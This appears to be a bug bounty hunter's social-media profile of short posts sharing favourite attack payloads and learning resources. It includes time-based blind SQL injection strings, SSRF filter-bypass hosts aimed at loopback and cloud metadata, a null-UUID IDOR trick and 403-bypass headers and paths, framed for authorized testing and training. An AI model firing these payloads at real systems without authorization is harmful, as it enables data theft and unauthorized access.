My favorite SQL injection payloads:
- 'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
- ')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/#
- 1-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)'
I collected these from HackerOne reports.
Behi
1,326 posts
Behi
@Behi_Sec
Bug Hunter & Tool Builder.
- My favorite SSRF payloads: - http://00000 - http://2130706433 - http://0x7f.1 - http://metadata SSRF blacklists are the easiest to bypass.
- IDOR Trick: If you're dealing with a UUID-based IDOR, try this: 00000000-0000-0000-0000-000000000000 This might expose default objects or unintended access.
- My favorite 403 bypass payloads: - X-Forwarded-For: 127.0.0.1 - /dir/..;/dir/ - Host: localhost - /admin -> /Admin - /file/../file What are your favorite payloads?
- - First Bounty Roadmap is free - PortSwigger Labs is free - PortSwigger Academy is free - Burp Community is free - HackerOne is free Everything you need to start bug hunting is free.
- I missed many bugs because I didn't have good wordlists. This repo contains curated wordlists to fuzz smarter.
- These are the bug bounty tools I use: - ffuf - waybackurls - LinkFinder - Arjun - cloud_enum What do you use?
- If you're looking for SQL injection payloads, You can find a comprehensive collection here: github.com/payloadbox/sql…
- I found a simple IDOR that turned into an account takeover. The bounty? $5,000. Here’s exactly how I found it 🧵👇
- This is an interesting write-up on turning a limited path traversal into $40K. If you fuzz the target enough, there's always something interesting:
- API testing is a goldmine in bug bounty. Learn the tricks here:
- SSRF bugs are more common than you might think. Learn the tricks here:
- Bug Bounty Tool: SwaggerSpy automates OSINT on SwaggerHub to find exposed Swagger files and potential secrets.
- Bug Bounty Tool: XSSTRON helps detect XSS bugs automatically while browsing the web.
